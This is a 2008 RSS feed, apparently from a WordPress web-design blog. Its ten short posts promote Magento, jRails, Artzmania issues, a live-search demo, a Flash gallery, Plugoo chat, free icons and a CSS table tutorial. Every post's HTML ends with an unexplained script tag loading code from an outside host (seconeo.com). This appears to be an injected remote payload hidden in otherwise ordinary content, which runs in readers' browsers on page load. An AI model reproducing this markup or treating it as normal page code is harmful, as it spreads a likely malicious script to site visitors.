<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>web applications and design resource</title>
	<atom:link href="http://www.notedown.com/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.notedown.com</link>
	<description>web applications and design resource</description>
	<lastBuildDate>Mon, 31 Mar 2008 22:32:51 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Magento 1.0 is here !</title>
		<link>http://www.notedown.com/?p=24</link>
		<comments>http://www.notedown.com/?p=24#comments</comments>
		<pubDate>Mon, 31 Mar 2008 22:26:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Apps]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=24</guid>
		<description><![CDATA[
The open-source eCommerce application magento 1.0 is finally here !! Lot of you were probably waiting for this release.  Don&#8217;t know what mangento is ? Magento is open-source ecommerce application with excellent features, active community/support and can be customized with ease.

key features :

Single Page Checkout
Ship to Multiple Addresses
Advanced Marketing Tools
SEO Features

Click here to view [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center" align="left"><img src="http://www.notedown.com/wp-content/uploads/2008/03/magento_10.jpg" alt="magento 1.0" /></p>
<p>The open-source eCommerce application magento 1.0 is finally here !! Lot of you were probably waiting for this release.  Don&#8217;t know what mangento is ? Magento is open-source ecommerce application with excellent features, active community/support and can be customized with ease.</p>
<p><span id="more-24"></span><br />
key features :</p>
<ul class="tabs-container generic-list">
<li style="cursor: pointer" class="active tab:magento_offers:1"><strong><span>Single Page Checkout</span></strong></li>
<li style="cursor: pointer" class="tab:magento_offers:2"><strong><span>Ship to Multiple Addresses</span></strong></li>
<li style="cursor: pointer" class="tab:magento_offers:3"><strong><span>Advanced Marketing Tools</span></strong></li>
<li style="cursor: pointer" class="tab:magento_offers:4"><strong><span>SEO Features</span></strong></li>
</ul>
<p><a href="http://www.magentocommerce.com/features" title="features">Click here to view List of complete features .</a></p>
<p><strong>Store demo can be veiwed here :</strong> <a href="http://www.magentocommerce.com/demo" title="Store Demo">http://www.magentocommerce.com/demo</a></p>
<p><strong>Download here :</strong> <a href="http://www.magentocommerce.com/download" title="download magento 1.0">http://www.magentocommerce.com/download </a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=24</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>jRails &#8211; jQuery on Rails</title>
		<link>http://www.notedown.com/?p=22</link>
		<comments>http://www.notedown.com/?p=22#comments</comments>
		<pubDate>Mon, 03 Dec 2007 13:19:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Web Components]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=22</guid>
		<description><![CDATA[ 
jRails is a drop-in jQuery replacement for Prototype/script.aculo.us on Rails. Using jRails, you can get all of the same default Rails helpers for javascript functionality using the lighter jQuery library.

jRails provides drop-in functionality for these existing Rails methods :



Prototype
form_remote_for
form_remote_tag
link_to_remote
observe_field
observe_form
periodically_call_remote
remote_form_for
submit_to_remote




Scriptaculous
draggable_element
drop_receiving_element
sortable_element
visual_effect




RJS
hide
insert_html
remove
replace
replace_html
show
toggle



The visual effects in jRails are based on the new jquery-fx library.      [...]]]></description>
			<content:encoded><![CDATA[<p> <img src="http://www.notedown.com/wp-content/uploads/2007/12/jrails.jpg" alt="jRails - jQuery on Rails" /></p>
<p>jRails is a drop-in <a href="http://jquery.com/">jQuery</a> replacement for <a href="http://www.prototypejs.org/">Prototype</a>/<a href="http://script.aculo.us/">script.aculo.us</a> on Rails. Using jRails, you can get all of the same default Rails helpers for javascript functionality using the lighter jQuery library.</p>
<p><span id="more-22"></span></p>
<p>jRails provides drop-in functionality for these existing Rails methods :</p>
<ul class="demos">
<li class="frame">
<ul class="listItems">
<li class="title"><strong>Prototype</strong></li>
<li>form_remote_for</li>
<li>form_remote_tag</li>
<li>link_to_remote</li>
<li>observe_field</li>
<li>observe_form</li>
<li>periodically_call_remote</li>
<li>remote_form_for</li>
<li>submit_to_remote</li>
</ul>
</li>
<li class="frame">
<ul class="listItems">
<li class="title"><strong>Scriptaculous</strong></li>
<li>draggable_element</li>
<li>drop_receiving_element</li>
<li>sortable_element</li>
<li>visual_effect</li>
</ul>
</li>
<li class="frame">
<ul class="listItems">
<li class="title"><strong>RJS</strong></li>
<li>hide</li>
<li>insert_html</li>
<li>remove</li>
<li>replace</li>
<li>replace_html</li>
<li>show</li>
<li>toggle</li>
</ul>
</li>
</ul>
<p>The visual effects in jRails are based on the new jquery-fx library.      jRails currently uses a slightly modified version of jquery fx code to get some of the desired effects.      This code is evolving and is subject to change.</p>
<p><strong>Demo / How to use/install jrails : <a href="http://ennerchi.com/projects/jrails" title="jrails - instructions">http://ennerchi.com/projects/jrails</a></strong><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=22</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Artzmania Issue 7 : Master Painter</title>
		<link>http://www.notedown.com/?p=20</link>
		<comments>http://www.notedown.com/?p=20#comments</comments>
		<pubDate>Mon, 03 Dec 2007 13:04:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Web Components]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=20</guid>
		<description><![CDATA[
Artzmania Issue 7 is out , this issue is dedicated to world of painting.
Not long back i made a post on their Artzmania 6th issue and the 7th issue is outnow.A must see for the artist out there to get inspiration .
Painting &#8211; Mind expression. Life perception. Hidden Inspiration. Still objects, Mother Nature, &#38; human [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.notedown.com/wp-content/uploads/2007/12/imagine-arts7thissue.jpg" alt="Artzmania Issue 7" /></p>
<p><strong>Artzmania Issue 7 is out , this issue is dedicated to world of painting.</strong><br />
Not long back i made a post on their Artzmania 6th issue and the 7th issue is outnow.A must see for the artist out there to get inspiration .</p>
<p>Painting &#8211; Mind expression. Life perception. Hidden Inspiration. Still objects, Mother Nature, &amp; human forms, were favorites among the great artisans, to be depicted into forms of paintings. Tracing through the history of arts, painting is considered as a priceless talent and their result on the canvas shows what it is really worth. It is no surprise that paintings, especially the rare ones (considered almost an antiquity) are expensive collectors&#8217; item.</p>
<p><span id="more-20"></span></p>
<p>As the world of arts evolved, artists have become more creative and innovative when it comes to showcasing their artistic side. The booming digital age has indeed transform the arts of painting into greater heights by enabling any artworks to be further enhanced with the existing advanced IT tools. Thus, Artzmania presents you the wonders of Traditional and Digital Paintings, from the new generation of art aficionados.</p>
<p>The result; one has to see them, to believe it. After all, paintings are meant to be viewed upon.</p>
<p>Enjoy the issue. Get inspired.</p>
<p><strong>Download you copy here  :</strong> <strong><a href="http://www.artzmania.com/" target="_blank" title="asrtmania issue 7">http://www.artzmania.com/</a></strong><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=20</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Livesearch using Codeigniter and Mootools</title>
		<link>http://www.notedown.com/?p=17</link>
		<comments>http://www.notedown.com/?p=17#comments</comments>
		<pubDate>Tue, 06 Nov 2007 18:04:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Apps]]></category>
		<category><![CDATA[others]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=17</guid>
		<description><![CDATA[
Came across this cool live-search ajax based app which uses Codeigniter/mootools. It slides results in suggestion box as user types. It works on any browser even if javascript is not supported even though the application is build using JavaScript .Go through this artclice at pr0digy.

How to :  http://pr0digy.com/codeigniter/live-search-with-codeigniter-and-mootools/
Live Demo : http://pr0digy.com/sandbox/ajax/livesearch
]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.notedown.com/wp-content/uploads/2007/11/livesearch_mootools.jpg" alt="Livesearch using Codeigniter and Mootools" /></p>
<p>Came across this cool live-search ajax based app which uses Codeigniter/mootools. It slides results in suggestion box as user types. It works on any browser even if javascript is not supported even though the application is build using JavaScript .Go through this artclice at pr0digy.</p>
<p><span id="more-17"></span></p>
<p>How to :  <a href="http://pr0digy.com/codeigniter/live-search-with-codeigniter-and-mootools/" title="how to" target="_blank">http://pr0digy.com/codeigniter/live-search-with-codeigniter-and-mootools/</a></p>
<p>Live Demo : <a href="http://pr0digy.com/sandbox/ajax/livesearch" title="Live-search demo " target="_blank">http://pr0digy.com/sandbox/ajax/livesearch</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=17</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Artzmania 6th Issue</title>
		<link>http://www.notedown.com/?p=15</link>
		<comments>http://www.notedown.com/?p=15#comments</comments>
		<pubDate>Wed, 31 Oct 2007 19:09:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Web Components]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=15</guid>
		<description><![CDATA[Artzmania 6th Issue, brings in the expression of arts that are imprinted to what artist has in their colorful and creative mind. Abstract drawings combination with the non-living and life object, delves into a deeper meaning of translating imagination into an art form.

Artzmania is an independent venture showcasing outstanding international creativity and culture
Download/preview : http://www.artzmania.com/
]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.notedown.com/wp-content/uploads/2007/10/imagine-arts6thissue.jpg" alt="Artzmania 6th Issue" />Artzmania 6th Issue, brings in the expression of arts that are imprinted to what artist has in their colorful and creative mind. Abstract drawings combination with the non-living and life object, delves into a deeper meaning of translating imagination into an art form.</p>
<p><span id="more-15"></span><br />
Artzmania is an independent venture showcasing outstanding international creativity and culture<br />
<strong>Download/preview :</strong> <a href="http://www.artzmania.com/" title="download artmania 6th issue">http://www.artzmania.com/</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=15</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Polaroid flash gallery</title>
		<link>http://www.notedown.com/?p=12</link>
		<comments>http://www.notedown.com/?p=12#comments</comments>
		<pubDate>Wed, 31 Oct 2007 18:04:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Web Components]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=12</guid>
		<description><![CDATA[
Polaroid gallery is a opensource flash gallery developed by Christopher Einarsrud, using a external xml file or a flickr RSS feed the script loads images and image titles . The script then processes the data and creates an interactive flash gallery.
Demo/download : http://www.no3dfx.com/polaroid/
]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.notedown.com/wp-content/uploads/2007/10/poloroid_flash_gallery.jpg" alt="Polaroid flash gallery" /></p>
<p>Polaroid gallery is a opensource flash gallery developed by Christopher Einarsrud, using a external xml file or a flickr RSS feed the script loads images and image titles . The script then processes the data and creates an interactive flash gallery.</p>
<p><span id="more-12"></span><strong>Demo/download</strong> : <a href="http://www.no3dfx.com/polaroid/" title="download/preview poloroid flash gallery">http://www.no3dfx.com/polaroid/</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=12</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Live Chat with Visitor of Your Website with Plugoo</title>
		<link>http://www.notedown.com/?p=10</link>
		<comments>http://www.notedown.com/?p=10#comments</comments>
		<pubDate>Sun, 21 Oct 2007 18:49:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Web Components]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=10</guid>
		<description><![CDATA[ 
With Plugoo you can chat directly from your Instant     Messenger with any visitor of your blog, personal webpage or e-sales site.When you’re logged into your Instant Messenger (Windows Live Messenger, Yahoo! Messenger, AIM, GoogleTalk, Jabber or ICQ), you can receive in real time all the comments of your visitors or [...]]]></description>
			<content:encoded><![CDATA[<p class="MsoNormal"> <img src="http://www.notedown.com/wp-content/uploads/2007/10/plugoo.jpg" alt="Plugoo" /></p>
<p class="MsoNormal"><span style="font-family: quot"><font face="Trebuchet MS">With Plugoo you can chat directly from your Instant     Messenger with any visitor of your blog, personal webpage or e-sales site.When you’re logged into your Instant Messenger (<strong>Windows Live Messenger, Yahoo! Messenger, AIM, GoogleTalk, Jabber or ICQ</strong>), you can receive in real time all the comments of your visitors or any question they might ask, and answer </font><font face="Trebuchet MS">instantly!.</font></span></p>
<p class="MsoNormal"><span id="more-10"></span></p>
<p class="MsoNormal"><font face="Trebuchet MS">On your blog, personal webpage or e-sales site, you set up a                 Plugoo (very easy to do, by the way!). Visitors on your site can see the               Plugoo and type a message in it to send it to you.This Plugoo is directly connected to your Instant Messenger                                     and forward you in real time all the messages your visitors send you. You               answer to the visitor directly from your Instant Messenger, LIVE!<br />
</font></p>
<p class="MsoNormal"><strong>Visit :</strong> <a href="http://www.plugoo.com/" title="plugoo instant live chat">http://www.plugoo.com/</a></p>
<p class="MsoNormal"><strong>License type :</strong> License Free</p>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=10</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free 1000 icons for web developers and designers</title>
		<link>http://www.notedown.com/?p=8</link>
		<comments>http://www.notedown.com/?p=8#comments</comments>
		<pubDate>Sun, 21 Oct 2007 18:31:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Graphic]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=8</guid>
		<description><![CDATA[
Silk web icon set, with 1000 icons absolutely free by Famfamfam , 							includes report icons, picture icons, buttons, 							and some hardware drive icons.  The feed icons have been 							brought into line with new standard, and all icons have been compressed to lower the filesize.

all the icons are available to download at  : www.famfamfam.com
]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.notedown.com/wp-content/uploads/2007/10/famfamfam_icons.gif" alt="1000 free icons" /></p>
<p>Silk web icon set, with <strong>1000 icons absolutely free <strong>by </strong></strong><strong>Famfamfam </strong>, 							includes report icons, picture icons, buttons, 							and some hardware drive icons.  The feed icons have been 							brought into line with new standard, and all icons have been compressed to lower the filesize.</p>
<p><span id="more-8"></span></p>
<p>all the icons are available to download at  : <a href="http://www.famfamfam.com/archive/silk-icons-thats-your-lot/" title="icons">www.famfamfam.com</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=8</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tables with dynamically highlighted columns</title>
		<link>http://www.notedown.com/?p=6</link>
		<comments>http://www.notedown.com/?p=6#comments</comments>
		<pubDate>Sun, 21 Oct 2007 18:14:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[CSS]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=6</guid>
		<description><![CDATA[
 When you click on &#8220;choose&#8221; for an option, that plan&#8217;s column highlights, the other plans vanish, and a signup form takes their place. There is a number of impressive things happening within this small area. askthecssguy recreate the behavior step by step, and share the power of combining CSS, JavaScript, and images in clever [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.notedown.com/wp-content/uploads/2007/10/css-highlightable.jpg" alt="dynamically highlighted columns" /></p>
<p><a href="http://www.askthecssguy.com/examples/crazyegg/example10.html"></a> When you click on &#8220;choose&#8221; for an option, that plan&#8217;s column highlights, the other plans vanish, and a signup form takes their place. There is a number of impressive things happening within this small area. askthecssguy recreate the behavior step by step, and share the power of combining CSS, JavaScript, and images in clever ways.  <a href="http://www.askthecssguy.com/examples/crazyegg/example10.html">view the final example</a></p>
<p><span id="more-6"></span> <a href="http://www.askthecssguy.com/2007/08/creating_a_table_with_dynamica.html" title="tables with dynamically highlighted colums tutorial">click here for step by step guid</a><a href="http://www.askthecssguy.com/2007/08/creating_a_table_with_dynamica.html" title="tables with dynamically highlighted colums tutorial">e</a><br />
For those who like to skip ahead: <a href="http://www.askthecssguy.com/examples/crazyegg/example10.html">view the final example</a> or <a href="http://www.askthecssguy.com/examples/crazyegg/soundsquirt-dynamic-table-example.zip">download a zip</a> with all the html, CSS, JavaScript, and supporting images used in this article.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=6</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Magento: Open source eCommerce solution</title>
		<link>http://www.notedown.com/?p=4</link>
		<comments>http://www.notedown.com/?p=4#comments</comments>
		<pubDate>Wed, 17 Oct 2007 03:18:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Apps]]></category>

		<guid isPermaLink="false">http://www.notedown.com/?p=4</guid>
		<description><![CDATA[
Some days back i came across this e-commerce application called magento, looks great, very flexibile and can be customized easily too. Unlike other e-commerce apps Magento has a reliable support and active community, which is very important when you need a quick help.It has features like Search Engine Optimization (SEO), Product Comparison, Marketing Features, Multiple [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.notedown.com/wp-content/uploads/2007/10/magento-logo.png" title="Magento ecommerce"><img src="http://www.notedown.com/wp-content/uploads/2007/10/magento-logo.png" alt="Magento ecommerce" /></a></p>
<p>Some days back i came across this e-commerce application called <strong>magento</strong>, looks great, very flexibile and can be customized easily too. Unlike other e-commerce apps Magento has a reliable support and active community, which is very important when you need a quick help.It has features like Search Engine Optimization (SEO), Product Comparison, Marketing Features, Multiple Languages and more&#8230;.</p>
<p><span id="more-4"></span></p>
<p class="col-1">&nbsp;</p>
<p><strong>-Smooth Integration</strong></p>
<p>Integrating third-party solutions should never be a hassle. Magento’s easy integration will help save you time and resources as you create a customized store around your business needs.</p>
<p><strong>-Cutting Edge Features</strong></p>
<p>Don’t pay extra for features like product tagging, multi-address shipping or product comparison systems. Instead, get these and more right out of the box with Magento.</p>
<p><strong>-Professional and Community Support</strong></p>
<p>Unlike many other open-source eCommerce solutions available, Magento offers professional, reliable support, as well as the help of its passionate community.</p>
<p><strong>-Completely Scalable</strong></p>
<p>Whether your store grows overnight or over a year, don’t spend valuable time worrying about your solution not growing with you. With Magento, your site is completely scalable.</p>
<p><strong>Demo Frontend :</strong> <a href="http://demo.magentocommerce.com/" title="Magento front end demo" target="_blank">http://demo.magentocommerce.com/</a></p>
<p><strong>Demo Admin panel :</strong> <a href="http://demo-admin.magentocommerce.com/" title="Magento Admin panel demo">http://demo-admin.magentocommerce.com</a><br />
<em>Username:<strong> admin</strong>  Password:<strong> 123123</strong></em><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notedown.com/?feed=rss2&amp;p=4</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
